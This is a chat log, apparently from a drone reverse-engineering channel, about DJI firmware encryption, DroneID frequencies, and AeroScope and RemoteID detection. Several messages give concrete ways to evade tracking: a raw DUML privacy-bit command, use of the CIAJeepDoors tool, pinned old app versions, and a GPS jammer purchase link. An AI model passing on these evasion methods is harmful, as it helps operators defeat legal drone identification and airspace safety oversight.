androidboot.secure_debug=0 AG601 has FC based on H6 V100 pv7k88.00S-1 Chip with E1E_DEBUG & MCU_DEBUG ports on board. Now stuck where to dig deeper… Now I would like to derive RSA keys to unpack: Trusted Applications (has total 5 of *.ta), rtos.img The ways I see as for now: * DMA Attack to dump all DDR4 ram and reverse unpacked OP-TEE RTOS * reset the RPMB Key and dig into RPMB partition * brute-force RSA keys)) Any suggestions?

[2023-02-12 16:19:22] tmbinc : Firmware is encrypted with TBIE (symmetric), not RSA

[2023-02-12 16:19:32] tmbinc : What's the deal with these chinese-only T40?

[2023-02-12 16:20:54] tmbinc : Also as much as I'd like to help, I'm out when we're talking publicly about un-geofencing drones that can carry 40kg, sorry :/

[2023-02-12 18:32:24] skynet : OP-TEE software (FC, etc.) are encrypted with pre-programmed RSA key.

[2023-02-12 18:32:24] skynet : OP-TEE software (FC, etc.) are encrypted with pro-programmed RSA key.

[2023-02-12 18:32:55] skynet : It doesn't matter Global or China version for this task.

[2023-02-12 18:33:22] skynet : We can talk PM. Btw, it carries 50kg.

[2023-02-12 18:54:46] tmbinc : Firmware is _verified_ by the RSA key (of which a hash is blown into fuses), but it's _decrypted_ with a key that's derived from the cust_key ("key 6") -> TBIE

[2023-02-12 19:12:20] skynet : Inside firmware (symmetrically encrypted with TBIE key) is image of RTOS OP-TEE part of software which is additional encrypted with RSA key. RTFM ARM TZ OP-TEE. RSA Private key is embedded into chipset at factory.

[2023-02-12 19:12:20] skynet : Inside firmware is image (symmetrically encrypted with TBIE key) of RTOS OP-TEE part of software which is additional encrypted with RSA key. RTFM ARM TZ OP-TEE. RSA Private key is embedded into chipset at factory.

[2023-02-12 22:00:10] whisper : whisper joined the channel.

[2023-02-13 12:06:53] gilroy34 : gilroy34 joined the channel.

[2023-02-13 14:21:02] longjohndroid : longjohndroid joined the channel.

[2023-02-13 23:29:48] hardaqa : hardaqa joined the channel.

[2023-02-14 15:20:33] cds : cds joined the channel.

[2023-02-14 16:20:22] balamacab : balamacab joined the channel.

[2023-02-15 03:00:19] ahai : ahai joined the channel.

[2023-02-16 17:32:01] markjw : markjw joined the channel.

[2023-02-17 05:28:12] ramzet : ramzet joined the channel.

[2023-02-17 16:45:19] oxolot : Anybody remembers which command was used to change privacy bits on Phantom 3? Usual 218 - 05 does not work there

[2023-02-17 18:54:57] ramzet : Gentlemen, In the process of trying to reset the drone id, I encountered a problem with the command 218, my drone responds to me like this 55 0f 04 a2 03 0a 00 00 80 03 da 05 00 b8 d9 Who can tell me what he is trying to tell me?

[2023-02-17 19:14:45] bitbangingbytes : Heard rumors of an AeroScope V2 coming out soon, anyone else heard that?

[2023-02-17 19:41:36] oxolot : Nothing. Only that he heard you. You will always get same answer regardless of what your privacy bits are

[2023-02-18 00:12:53] asdqwe : asdqwe joined the channel.

[2023-02-18 06:16:43] ramzet : And that's not quite the command ( --bulk -a 2 -t 1000 -r 0300 -s3 -i 218 -x 0800000000) He responded like this (55 23 04 2e 03 0a 00 00 80 03 da 08 00 13 63 6f 6d 2e 64 6a 69 2e 69 6e 64 75 73 74 72 79 2e 70 69 e6 3a)

[2023-02-18 06:26:05] ramzet : He definitely communicates with me, but I don't understand what ( --bulka 2 -t 1000 -r 0300 -s3 -i 218 -x 0b00000000 55 97 04 17 03 0a 00 00 80 03 da 0b 00 05 e7 07 02 11 0a 3b 20 13 63 6f 6d 2e 64 6a 69 2e 69 6e 64 75 73 74 72 79 2e 70 69 e7 07 02 11 0a 20 01 13 57 49 4e 5f 53 44 4b 5f 44 45 46 41 55 4c 54 5f 55 49 44 e7 07 02 09 16 1b 0f 13 57 49 4e 5f 53 44 4b 5f 44 45 46 41 55 4c 54 5f 55 49 44 e7 07 02 07 07 38 37 13 63 6f 6d 2e 64 6a 69 2e 69 6e 64 75 73 74 72 79 2e 70 69 e7 07 02 05 13 16 25 13 63 6f 6d 2e 64 6a 69 2e 69 6e 64 75 73 74 72 79 2e 70 69 e4 40)

[2023-02-18 06:26:05] ramzet : And that's not quite the command ( --bulk -a 2 -t 1000 -r 0300 -s3 -i 218 -x 0800000000) He responded like this (55 23 04 2e 03 0a 00 00 80 03 da 08 00 13 63 6f 6d 2e 64 6a 69 2e 69 6e 64 75 73 74 72 79 2e 70 69 e6 3a)

[2023-02-18 07:29:11] oxolot : Try Hex to ASCII conversion and the mystery will be solved :)

[2023-02-18 12:27:17] pingspike : It would make sense @bitbangingbytes as the old Mobile model has been end of life for a while now

[2023-02-18 15:26:22] tissy : Hopefully it'll be an open protocol that the drone transmits which can then easily be integrated into existing CUAS systems without having to use the specific current Aeroscope hardware.

[2023-02-19 04:56:24] helpmetom : helpmetom joined the channel.

[2023-02-19 14:13:21] bombo : bombo joined the channel.

[2023-02-19 19:54:25] crazyfluffypony : crazyfluffypony joined the channel.

[2023-02-20 15:54:59] dkovar : Most of the CUAS systems do decode DroneID packets already. They're also adding the U.S. RemoteID.

[2023-02-20 17:55:05] gudvin : gudvin joined the channel.

[2023-02-20 23:17:15] bitbangingbytes : Any CUAS systems you are aware of by name that currently decode DroneID without the use of an AeroScope?

[2023-02-21 03:07:46] nmikus : I thought wrt DJI that DroneId/Aeroscope was just RemoteId compliant. So in the US DroneId==RemoteID... is that not the case?

[2023-02-21 05:31:53] joh : joh joined the channel.

[2023-02-21 06:06:32] gudvin : Please help me with CIA Jeepdoors-Gui.py. I installed the pyusb and libusb libraries, copied the file to the directory with dji-firmware-tools. The script is running. However, when the application is launched and the connect button is pressed, the program closes. How can i use ibusb0.dll? How to connect it correctly?

[2023-02-21 06:06:32] gudvin : Please help me with CIA Jeepdoors-Gui.py. I installed the pyusb and libusb libraries, copied the file to the directory with dji-firmware-tools. The script is running. However, when the application is launched and the bulk connect button is pressed, the program closes. How can i use ibusb0.dll? How to connect it correctly?

[2023-02-21 06:06:32] gudvin : Please help me with CIA Jeepdoors.py. I installed the pyusb and libusb libraries, copied the file to the directory with dji-firmware-tools. The script is running. However, when the application is launched and the connect button is pressed, the program closes. How can i use ibusb0.dll? How to connect it correctly?

[2023-02-21 11:41:19] iosav : iosav joined the channel.

[2023-02-21 15:29:03] dkovar : My recollection is that DJI proposed DroneID as a possible RemoteID standard but that they are fundamentally different. DJI's RemoteID implementation should be transmitting data common to both but via different mechanisms. The common RemoteID medium is Bluetooth.

[2023-02-22 02:52:12] kylebamboo : kylebamboo joined the channel.

[2023-02-23 04:25:36] nmikus : bluetooth? I thought that was only for short range transmission....

[2023-02-23 09:11:03] valakas : valakas joined the channel.

[2023-02-23 20:33:24] dkovar : A RemoteID provider in the U.S. is getting rather long ranges using bluetooth in open spaces.

[2023-02-24 04:45:54] nmikus : what is long?

[2023-02-24 05:22:07] ibndias : ibndias joined the channel.

[2023-02-24 14:22:20] sinco : sinco joined the channel.

[2023-02-24 16:25:29] dkovar : Over a kilometer in some cases.

[2023-02-24 19:59:47] skull14541 : skull14541 joined the channel.

[2023-02-27 08:02:05] newmanhero : newmanhero joined the channel.

[2023-03-02 21:51:25] aholtzma : Some very nice work here by SysSec - https://github.com/RUB-SysSec/DroneSecurity

[2023-03-02 22:27:41] dkovar : Wired article describing some of the context: https://www.wired.com/story/dji-droneid-operator-location-hacker-tool/

[2023-03-04 03:11:49] bitbangingbytes : Actually working on getting that running now with an SDR, seems it needs a bit of TLC to make it work with live data

[2023-03-04 03:11:49] bitbangingbytes : Actually working on getting that running now with an SDR, seems it's needs a bit of TLC to make it work with live data

[2023-03-04 07:01:44] efwefaf :

[2023-03-04 07:31:35] leatherman1 : leatherman1 joined the channel.

[2023-03-04 16:25:02] i9029 : i9029 joined the channel.

[2023-03-04 17:20:02] gudvin : Friend, where can I get this parser?

[2023-03-04 21:14:50] faquaral : faquaral joined the channel.

[2023-03-05 11:21:02] areoc : https://b3yond.d3vl.com/duml/

[2023-03-05 12:27:02] efwefaf : Can anyone use this to unlock the DJI T40 battery and modify the number of cycles

[2023-03-06 22:26:40] flylusive_pat : trb_pat joined the channel.

[2023-03-06 22:54:36] kateonki : kateonki joined the channel.

[2023-03-07 15:12:48] mud : mud joined the channel.

[2023-03-07 15:27:55] carrels_entails.0e : carrels_entails.0e joined the channel.

[2023-03-08 04:39:00] ololosha : ololosha joined the channel.

[2023-03-08 08:15:10] papalegba : Also, I'm told you cannot use BladeRF since they are using a library that requires Ettus devices.

[2023-03-08 13:18:29] bitbangingbytes : Yea, I've been studying their implementation. It's not overly complex how they gather samples for processing so I think it can be modified to use other SDR's or perhaps turned into a GNURadio implementation

[2023-03-09 17:24:20] pkytwotwo : pkytwotwo joined the channel.

[2023-03-10 07:16:30] papalegba : There's also the proto11 implementation that precedes this one.

[2023-03-10 14:58:54] dkovar : Anyone know of a RemoteID -receiver- application for ESP32 such as LilyGo's TBeams?

[2023-03-10 22:21:23] sparkyws : These are selling a lilygo t-display-s3 that runs RID https://www.milehighdroneservices.com/remoteId.php

[2023-03-11 03:36:04] dkovar : Thank you. Talking with them now.

[2023-03-11 04:06:43] bitbangingbytes : I've used those, pretty good with an external antenna

[2023-03-11 12:42:02] dkovar : I love those boards.

[2023-03-11 18:05:41] bopoh : bopoh joined the channel.

[2023-03-12 07:55:16] mingtao : anyone need G8 - i have few sets in Dubau 100k$

[2023-03-12 08:32:24] papalegba : I thought they cost about $5k for mobile and $25k for stationary

[2023-03-12 08:40:31] mingtao : i also thought it ) but ...

[2023-03-12 09:53:34] azerbaijan : Russian economy... You didn't understand...

[2023-03-12 12:55:46] mingtao :

[2023-03-12 14:58:36] papalegba : You can ask but it doesn't mean you are gonna get it ?

[2023-03-12 14:58:36] papalegba : You can ask ?

[2023-03-12 23:59:06] bitbangingbytes : It'll be a good scam for a while I'm sure

[2023-03-14 13:54:58] stanlu : stanlu joined the channel.

[2023-03-14 19:20:55] anghammarad : anghammarad joined the channel.

[2023-03-14 20:53:40] andris8888 : @andris8888 left the channel.

[2023-03-14 23:19:21] syska : syska joined the channel.

[2023-03-17 03:03:29] moyditumla : moyditumla joined the channel.

[2023-03-21 11:19:45] papalegba : Does anybody know where in the firmware the broadcast of the drone id is happening? That is, where the coordinates of the drone, RC and homepoint are being sent out? I'm working with the M3 and M3E/T.

[2023-03-21 14:10:44] nmikus : its created in the FC

[2023-03-21 14:28:35] papalegba : Where and how do you know? Because I can find the get/set drone id handler but can't find the place where it's "created".

[2023-03-21 14:29:11] tmbinc : It's a "report", similar to the OSD data etc. reports.

[2023-03-21 14:30:02] tmbinc : Easiest way to find is probably to follow the "privacy bits" i.e. what CIAJeepDoors (tries to) write

[2023-03-21 14:30:18] tmbinc : (Even though the functionality is done/crippled I think the privacy bits are still tracked)

[2023-03-21 14:30:58] tmbinc : Or yeah, the uuid or flight reason or something would work equally

[2023-03-21 14:31:28] papalegba : @tmbinc O

[2023-03-21 14:31:28] papalegba : @tmbinc I'll dig in further but it didn't look like anything else was using those bits which is why I'm asking. I mean, the privacy bits.

[2023-03-21 14:32:53] papalegba : It's quite possible that I haven't mapped all of the code yet, although I'm pretty sure I mapped most of it.

[2023-03-21 14:33:00] papalegba : What are these reports?

[2023-03-21 14:39:20] tmbinc : OSD report is pushed to the app that contains all the data the app keeps displaying

[2023-03-21 14:39:24] tmbinc : like speeds, position, ...

[2023-03-21 14:39:55] papalegba : Haven't found these either. Not yet, anyway.

[2023-03-21 15:29:07] nmikus : I have looked at various flight controllers, and found where drone id structures are populated, then passed up to userspace, then down into the modem/dsp. You are looking @ the m3 FC?

[2023-03-21 15:29:49] papalegba : M3E at the moment. I do have the M3 FC but haven't reversed it yet.

[2023-03-21 15:31:57] nmikus : I haven't looked @ the M3E but I assume its a similar setup

[2023-03-21 15:39:59] papalegba : Where in the M3 FC then?

[2023-03-21 16:12:45] chinanumberone : chinanumberone joined the channel.

[2023-03-22 03:39:28] nmikus : don't have it in front of me atm but I remember it being some callback nonsense so ghidra/ida may not auto detect it as code

[2023-03-22 06:09:34] coldflake : Did you get through the 2nd layer encryption?

[2023-03-22 09:01:50] papalegba : I will keep looking. Please ping if you remember more about it.

[2023-03-22 21:52:10] shuke : 中国大陆为什么好像无法开启精灵3a32信道，求解，敢接

[2023-03-22 21:59:47] shuke : 请问大疆精灵3a如何增强信号

[2023-03-23 04:42:56] papalegba : @shuke 对于初学者，我会用英语写

[2023-03-23 07:12:57] coldflake : For the phantom 3...if I got the translation right, there are no boost hacks because they are targeted occusync and not lightbridge. No one really cared to capture the packet which set FCC mode for lightbridge but if you do that it can be done.

[2023-03-23 11:42:22] chinanumberone : did someone manage to make adb shell for mavic 3?

[2023-03-23 11:55:57] cs2000 : Nothing for MP3 is public currently AFAIK

[2023-03-23 14:41:17] chinanumberone : maybe there are people who can not share much information? :sweat_smile:

[2023-03-23 16:20:31] dronez4u : dronez4u joined the channel.

[2023-03-24 16:32:07] cs2000 : Yes of course there are! There are always DJI spies watching & other reasons too

[2023-03-24 17:24:13] efimato_re : efimato_re joined the channel.

[2023-03-24 17:36:50] efimato_re : what's the deal with dji-spies?

[2023-03-24 22:57:59] cs2000 : !DJI

[2023-03-24 22:58:00] dji-rev-bot : The monstrous DJI eye turns to face you....

[2023-03-24 22:58:16] cs2000 : They're **always** watching

[2023-03-27 19:26:44] kennyx : kennyx joined the channel.

[2023-03-28 16:32:47] tmbinc : Can someone remind me, are there fixed frequencies for DroneID or are they "all over the place"? I know Aeroscope has 4x receivers but is that necessary? (And yes I feel bad for not knowing the answer myself.)

[2023-03-28 16:33:18] papalegba : They need to be scanned for, within a range.

[2023-03-28 16:33:44] tmbinc : But how large is that range?

[2023-03-28 16:41:37] papalegba : Take a look here https://github.com/RUB-SysSec/DroneSecurity

[2023-03-28 16:44:31] papalegba : Also here https://github.com/proto17/dji_droneid/

[2023-03-28 17:00:16] tmbinc : I'm aware of both, but is it truly not possible to constrain these more?

[2023-03-28 17:00:21] tmbinc : (The frequency ranges)

[2023-03-28 17:38:28] papalegba : Not that I know. Plus, the repos are really fudging their scan.

[2023-03-29 02:27:01] enigma2 : in lb is in dl. so at least 8 channels and some constant frequency centers are for OC (not related to dl). meanwhile u don't know the drone is in 2.4 or 5.8 . so you must have both simultaneously . (2x). and lots of centers in one band for each protocol (again 2x) =4x u cant force the drone pilot to work in specific band or frequency. DJI has ordered a great number of radio chips for the drones before(LC1860C/AR8001). using them in the Aero has no cost for him !

[2023-03-29 02:27:01] enigma2 : in lb is in dl. so at least 8 channels and some constant frequency centers are for OC (not related to dl). meanwhile u don't know the drone is in 2.4 or 5.8 . so you must have both simultaneously . (2x). and lots of centers in one band for each protocol (again 2x) =4x u cant force the drone pilot to work in specific band or frequency.

[2023-03-29 02:27:01] enigma2 : in lb is in dl. so at least 8 channels and some constant frequency centers are for OC (not related to dl). meanwhile u don't know the drone is in 2.4 or 5.8 . so you must have both simultaneously . (2x). and lots of centers in one band for each protocol (again 2x) u cant force the drone pilot to work in specific band or frequency.

[2023-03-29 02:27:01] enigma2 : in lb is in dl. so at least 8 channels and some constant frequency centers are for OC (not related to dl). meanwhile u don't know the drone is in 2.4 or 5.8 . so you must have both simultaneously . (2x). and lots of centers in one band for each protocol (again 2x) =4x u cant force the drone pilot to work in specific band or frequency. DJI has ordered a great number of radio chips for the drones before(LC1860C/AR8001). using them is the Aero has no cost for him !

[2023-03-29 06:24:18] oxolot : People say that droneID is transmitted only at 2.4. Even if you are operating drone at 5.8. Not true?

[2023-03-29 20:13:27] eseven : Not true. Drone sends droneid randomly using 2.4 and 5.x Ghz. At each channel, sends 13 bursts and then change to another channel. Use to spend about 30s at each band...

[2023-03-31 22:15:37] top7chip : top7chip joined the channel.

[2023-04-01 16:14:13] eug3nix : eug3nix joined the channel.

[2023-04-02 21:44:48] tacticaltot : tacticaltot joined the channel.

[2023-04-04 14:21:05] brillio : brillio joined the channel.

[2023-04-05 08:26:41] the_lord : https://dji-rev.com/dji-rev/pl/a1cdaxeqppda5qpgurpudb9tma

[2023-04-05 09:46:57] tmbinc : Thanks! So I'm also seeing the "13x and then it switches freq" (though I can't track all frequencies with my setup here).

[2023-04-05 09:49:52] papalegba : What's your setup? Do you have a BladeRF XA9?

[2023-04-05 09:50:55] tmbinc : Currently it's a PlutoSDR with MaiaSDR installed, my other setup is a Frankenstein'ed Keysight EXM E6640A (but meh it's effort to bring it up)

[2023-04-05 10:32:18] tmbinc : I think it's this table:

[2023-04-05 10:32:18] tmbinc : I think it'

[2023-04-05 10:33:53] tmbinc : (This firmware may not support 5.7GHz band) - nevermind, just has a more limited set

[2023-04-05 10:33:53] tmbinc : (This firmware may not support 5.7GHz band)

[2023-04-05 12:27:21] tmbinc : I think these frequency are actually the "initial channel list" where also the remote starts scanning

[2023-04-05 12:30:04] tmbinc : Oh nevermind, that's another list:

[2023-04-05 12:32:55] papalegba : What firmware is this?

[2023-04-05 12:32:55] papalegba : Is this the FC? Which drone and what firmware version?

[2023-04-05 13:02:43] eseven : This are real freqs?. Do you know relations between channel and freq? First list seems plausible by freq distance, but channel jumping is not sequential. Do you see if there is a jump pattern there?

[2023-04-05 16:17:05] tmbinc : These are "physical channel numbers" (I call them that, not sure what the proper name is). 1001..1083 are 2400..2482 MHz, and 2539...2663 are 5725..5849 MHz

[2023-04-05 16:17:10] tmbinc : (I hope I'm not confused)

[2023-04-05 16:17:19] tmbinc : the jumping pattern indeed follows a scrambling code

[2023-04-05 16:18:40] tmbinc : there's a 32-entry hopping table, generated by a goldcode

[2023-04-05 16:18:51] tmbinc : but I fail to see where the seed comes from

[2023-04-05 16:19:34] tmbinc : It then takes the low 2 bits (if 2.4GHz only) or low 3 bits (if dualband) and indexes the dronid_freq_table

[2023-04-05 16:19:48] tmbinc : I.e. essentially it's a 32-cycle

[2023-04-05 16:22:22] tmbinc : I _think_ it uses a seed that's similar to the .. uplink(?) .. seed, but generated in a very different way

[2023-04-05 21:54:52] aholtzma : those numbers could be earcnf like, where the frequency is a base plus the number times a raster

[2023-04-05 21:54:52] aholtzma : those numbers could be earfcn like, where the frequency is a base plus the number times a raster

[2023-04-05 21:55:36] aholtzma : you'd need that to hit the 0.5 MHz raster that the droneid carriers seem to be on

[2023-04-08 07:00:24] kennyx : Hi, which firmware version would I need to downgrade to on Mavic Air 2 (vm231) in order to be able to use CJD with the privacy bits?

[2023-04-08 16:37:24] oakley75 : 460 definately works.

[2023-04-11 15:43:02] blowfish448 : blowfish448 joined the channel.

[2023-04-11 17:53:41] dmtstarpilot : Hi, Does using jeepdoors show the drones serial number on a mavic 2 ?

[2023-04-12 21:59:18] tissy : JeepDoors "hides" certain DJI models serial number from Aeroscope based systems.

[2023-04-14 19:47:25] jcase : @tissy its flawed for some devices

[2023-04-14 19:47:39] jcase : some firmwares on some devices will periodically ignore the privacy bits

[2023-04-14 19:48:04] jcase : others are known to reset the bits

[2023-04-14 19:55:29] tissy : Thank you @jcase Absolutely, it was more of a correction to @dmtstarpilot post that it "hides" a serial not "shows" the serial ?

[2023-04-15 11:03:10] dmtstarpilot : Thank you for the information. The firmware on my mavic 2 zoom model is v01.00.0770.

[2023-04-19 12:54:11] dji1278 : dji1278 joined the channel.

[2023-04-19 15:34:48] dainis.forums : dainis.forums joined the channel.

[2023-04-19 16:55:42] k_k : kulkraus joined the channel.

[2023-04-20 23:21:22] rec00rsiff : rec00rsiff joined the channel.

[2023-04-21 14:11:49] oxkotb : oxkotb joined the channel.

[2023-04-21 17:12:23] gudvin : I heard that on mavik3t you can disable the gps of the remote by installing the RC Pro firmware (rm510b). Does anyone know how to do this?

[2023-04-21 18:57:30] sambuko : very easy to use gps jammer Like in photo

[2023-04-22 10:22:50] coldflake : Do you have a link for it?

[2023-04-22 11:02:21] ekate : ekate joined the channel.

[2023-04-22 20:24:16] sambuko : Yes. you can find it on aliexpress or Taobao.

[2023-04-22 20:26:51] sambuko : https://a.aliexpress.com/_DnBInz7

[2023-04-23 12:40:53] torich : torich joined the channel.

[2023-04-25 10:23:09] supertester : supertester joined the channel.

[2023-04-26 14:41:45] icanstillfly : icanstillfly joined the channel.

[2023-04-26 20:43:07] uskve : "Further, during our security analysis, we found a publicly unknown DUML command that seemed to allow configuring and disabling the different DroneID values. According to DJI, this command is part of an internal API that should not be available externally. This has been fixed in the latest model. Using our live DroneID decoder, we could confirm that this command does not disable the DroneID packets but replaces the respective values within the packet with the value ‘fake’." https://www.ndss-symposium.org/wp-content/uploads/2023/02/ndss2023_f217_paper.pdf

[2023-04-26 20:43:10] uskve : interesting...

[2023-04-26 22:42:03] konraditurbe : Yeah, that command was revealed in this channel a few years ago.

[2023-04-27 05:47:20] theminer : theminer joined the channel.

[2023-04-27 14:19:47] theminer : HI, I'm newbie here. My Mini SE on 01.00.0000 firmware. Am I right that if the CIA Jeep Doors show status DroneID is disable, my SE will not broadcast beacon that will be show information about my drone and it's pilot on AS based program? Or now Aeroscope have other way to detect it without DroneID broadcasting? Thank you so much.

[2023-04-27 14:19:47] theminer : HI, I'm newbie here. My Mini SE on 01.00.0000 firmware. Am I right that if the CIA Jeep Doors show status DroneID is disable, my SE will not broadcast beacon that will show information about my drone and it's pilot on AS based programs/tools? Or now Aeroscope have other way to detect it without DroneID broadcasting? Thank you so much.

[2023-04-27 14:26:04] theminer : I am a citizen of Ukraine in Sumi and will use this drone to checking around in many situation. So for me its' really safety reason. Thank you guy so much and forgive me for my bad English tho.

[2023-04-27 14:28:06] efimato_re : which aerscope you are asking about? the civil version? or the G-mnt one?

[2023-04-27 14:29:19] theminer : both maybe. I don't know which exactly Russian use to find location of drone operator.

[2023-04-27 14:50:07] konraditurbe : Hi, you should not rely solely just on the output of CIAJD, since the firmware could return a valid response and not actually turn off the broadcast. The tooll was tried and tested with different ACs but those are Mavic 3/Air2S etc... On older FW versions, prior to April 2022. If you're a civilian, I'd advise you to not fly it, as the drone could draw attention to you. Drones which have been hacked with CIAJD do appear on Aeroscope receivers, but the operators will see blank coordinates for pilot and drone (0.0000,0.0000).

[2023-04-27 14:57:24] theminer : thank you so much for your advice. then i think i will just not fly it.

[2023-04-27 15:07:50] efimato_re : @konraditurbe > Drones which have been hacked with CIAJD do appear on Aeroscope receivers if you switch to map view, the drone mark will still move over the map? even if coords were scrambled with ciajd where does these coords come from then?

[2023-04-27 15:11:38] konraditurbe : Nothing appears on map. Here's a video from the occupiers showing how different drones appear: https://twitter.com/faineg/status/1602690997082882048

[2023-04-27 15:49:16] theminer : Thank you so much for information.

[2023-04-27 17:41:39] theminer : From what I tried in my basement seem like firmware version 01.00.0000 on Mini SE didn't re-enable the Drone ID flag after disable by CIAJD. But all the fly app that compatible with Android 13 both Litchi 4.26.2 and DJI Fly 1.6.12 did re-enable flag as soon as it connect to drone. So only can use with Older Android phone.

[2023-04-28 08:35:53] baxove : That's correct, DJI Fly 1.5.10 is the latest version that does not re-enable flags when connecting to the drone. I also have an Android 13 phone, but I use a dedicated phone with Android 12 in offline mode for flying so that I can use DJI Fly 1.5.10 with my Mini 2 (fw 01.03.0000). Flags do not re-enable, so I really hope it works, but I do not have an Aeroscope to test it.

[2023-05-03 04:28:29] lepuss : lepuss joined the channel.

[2023-05-03 05:24:18] sawman : sawman joined the channel.

[2023-05-03 05:36:54] sawman : @sawman left the channel.

[2023-05-03 09:16:57] dongmou : dongmou joined the channel.

[2023-05-03 13:18:00] baxove : From what I understand, CIAJeepDoors disables the DroneID broadcast (for certain DJI models and firmware) to Aeroscopes only. However, I am unsure if there are other detection systems out there and, if so, how common are they and what type of information are they able to detect? I have tried to search for this information on the internet, but could not find anything.

[2023-05-03 18:17:08] bitbangingbytes : Bluvec

[2023-05-03 18:17:40] bitbangingbytes : https://bluvec.com/

[2023-05-03 19:32:15] bitbangingbytes : That's specifically protocol decoding, then there are other systems such as RF direction finding that work regardless of CIAJEEPDOORS or not

[2023-05-03 19:33:10] bitbangingbytes : SkyCope, MyDefense, DeDrone and others

[2023-05-03 19:33:21] bitbangingbytes : For RF Direction finding

[2023-05-04 06:42:27] baxove : Interesting. Can these systems also detect the position and altitude of the drone? And how about the pilots position if the RC and the phone is offline?

[2023-05-04 07:25:47] enigma2 : there are 2 things : 1.if a company has decoded the the entire protocol now its possible to intercept the pilot position from the uplink( the rc send it ;-) ) and the drone location from downlink (the info you are seeing in DJI GO). does not need the droneid packets that have been designed only for aeroscope. 2. if you have not decoded the protocol and the droneid is disabled you can still DoA (direction of arrival) the uplink signal and find the pilot direction (not exact position ) .

[2023-05-04 07:25:47] enigma2 : there are 2 things : 1.if a company has decoded the the entire protocol now its possible to intercept the pilot position from the uplink( the rc send it ;-) ) and the drone location from downlink (the info you are seeing in DJI GO). does not need the droneid packets that have been designed only for aeroscope. (CIAjeepdoor is only for disabling droneid) 2. if you have not decoded the protocol and the droneid is disabled you can still DoA (direction of arrival) the uplink signal and find the pilot direction (not exact position ) .

[2023-05-04 08:52:57] baxove : Oh, I see. So basically people will always be able to see where I am flying. Thanks for your answers

[2023-05-05 00:07:06] bitbangingbytes : If you want them to not see you, then you need a setup where the drone flies autonomously and you aren't blasting out RF control signals. They can still track the drone via other means, but your own position won't be easily identifiable

[2023-05-05 00:37:34] oakley75 : Yep cause you can then just turn off the RC. As long as they don't visually see it.

[2023-05-05 01:33:35] johnnokomis : How is this going to be handled when the drone is being flown over the internet? Using the DJI dock the M30 can now be flown this way. I assume additional Enterprise drones will soon be added. In the countries where the 4G dongle already works what does it broadcast for a location? AFAIK, RID is still active outside the US.

[2023-05-05 17:53:42] theminer : regarding CIAjeepdoors, Are there any problem if I switch from RC-N1 to DJI RC?

[2023-05-05 17:58:56] konraditurbe : Make sure the app is 1.5.10 or lower on both.

[2023-05-05 21:39:04] cloudwerx : DAMNIT! I was all good and happy had my Mavic 2 Pro all souped up, DH Cert working, CIAJD working great and then I went ahead and updated as figured since DH was recommending it, it wouldn't break anything, but now CIAJD is showing 01011111 :-( Did they change the RSA key or something? DUML disabled or did they shuffle around the bits? I went from 770->790 FW

[2023-05-05 21:40:35] cloudwerx : Still got the MP1 for covert missions but man, I should know better

[2023-05-06 12:16:00] jay : jay joined the channel.

[2023-05-07 11:52:16] lolo780 : Fuck DJI. If an update says update flight safety with nothing else, do not upgrade.

[2023-05-07 13:52:06] jcase : dont rely on CIAJD as a bypass for AS, some drone firmwares are bugged and will off/on ignore the settings

[2023-05-08 13:38:47] cloudwerx : it appears everything else works on .790, the DH Cert. hack works, FCC Boost, editing peram's.. Does anyone have an idea of what DJI did in order to break the CIAJD hack? Think this is something that is permanently "fixed" or is it just a matter of changing the DUML commands? fuck DJI! I hate the fact that my location is broadcasted realtime, such an invasion of privacy and the fact I can't turn it off, and did not sign up for this, should be illegal. I am not trying to fly my drone over area-51, or race jet liners, just want privacy while I take neat videos and photos of nature. I can go buy a assault rifle and legally carry it around, I can even carry a sword around in my State but people think my drones are such a threat it's crazy.

[2023-05-08 13:45:15] joonas : they patched it properly. modifying DUML is not going to get you anywhere. and eh, i don't like it either, but it's in fact illegal for DJI to sell you a drone w/o rid or one that lets you disable it. so your only other option is to start building your own.

[2023-05-08 21:02:58] dkovar : You did sign up for "this" when you accepted the DJI EULA when you first turned on your drone. And as of September, any drone sold in the U.S. required to broadcast Remote ID data unless you are flying in a FRIA or if you are flying a drone that is not required to be registered. (i.e., recreational and under 250g.) RemoteID is problematic and I'll not be surprised if their are court challenges relating to privacy after September.

[2023-05-10 04:52:17] theminer : Is it true that Mini 3 Pro with original firmware 01.00.0100 are able to Disable DroneID via modded DJI RC which send some command to disable DroneID bit? Someone offer me this service just want to know is it really possible?

[2023-05-10 06:39:39] eddy : I'm afraid this is not possible on newer drones. It's probably possible to enable: "disable remote control localization" Correct me if I'm wrong.

[2023-05-10 07:12:32] coldflake : It is possible but only for older firmware, like the one you mentioned

[2023-05-10 07:25:49] konraditurbe : Which app version would one use for this? Past 1.5.10 it sends enable droneID command. And 1.5.10 is not compatible with DJI RC?

[2023-05-10 07:33:31] eddy : It should also work with the latest apk, provided you use the mentioned hack.

[2023-05-10 07:34:47] konraditurbe : Which hack is this?

[2023-05-10 07:35:11] eddy : "SIncoder" for DJI RC

[2023-05-10 07:35:11] eddy : "Sincoder" for DJI RC https://mavicpilots.com/threads/some-guy-doing-an-fcc-hack-permanent-for-rc-pro-controller.133836/

[2023-05-10 13:01:24] dereksynkopa : Droneid is one problem, but what about RemoteID over wi-fi? Does the hack disable it too? I'll check it today and let you know. Until now my mini 3 pro was still visible in the drone scanner app.

[2023-05-10 13:25:49] joonas : the fws that let you disable over DUML only supported DJIs custom droneid and any new builds with official RemoteID don't have the DUML functionality anymore. at least as far as i know, but someone else should confirm this.

[2023-05-10 16:30:25] eddy : @dereksynkopa :: RemoteID is OFF, @coldflake DroneID it sems is ON (Not verified on AS). tested with Mini3Pro fmw = 01.00.0100, with and without apk 1.9.1 /patched/, DJI RC ..

[2023-05-10 17:00:19] coldflake : @eddy Sorry, I read it as Mavic 3, not mini 3...my bad

[2023-05-10 17:59:42] dereksynkopa : Unfortunately, my test does not confirm the operation of hack droneid. I have firmware 01.00.0100 in drone, 01.02.0300 in RC, Apk 1.9.1. The drone scanner application easily gives the position of the drone and its serial number, which is included in the remoteID. Switching led on, led off commands works, so part of the hack seems to work. Maybe I'm doing something wrong?

[2023-05-10 18:12:38] eddy : Good question, I don't know. I last had RemoteID active with apk 1.6.1 ++ RC= 01.00.0200 .. Now it is OFF. But the FCC hack will probably change the country. Isn't that the key?

[2023-05-10 23:51:05] cloudwerx : Do we know what version of DJI GO and\or Litchi started enabling DroneID when used? This is for Android btw

[2023-05-11 09:50:42] oxolot : dji.go.v5_1.6.1-3051774

[2023-05-12 09:06:55] ant : ant joined the channel.

[2023-05-14 11:24:55] joelg : joelg joined the channel.

[2023-05-16 14:29:44] retrocall : yes

[2023-05-16 14:51:02] eddy : What does AS say?

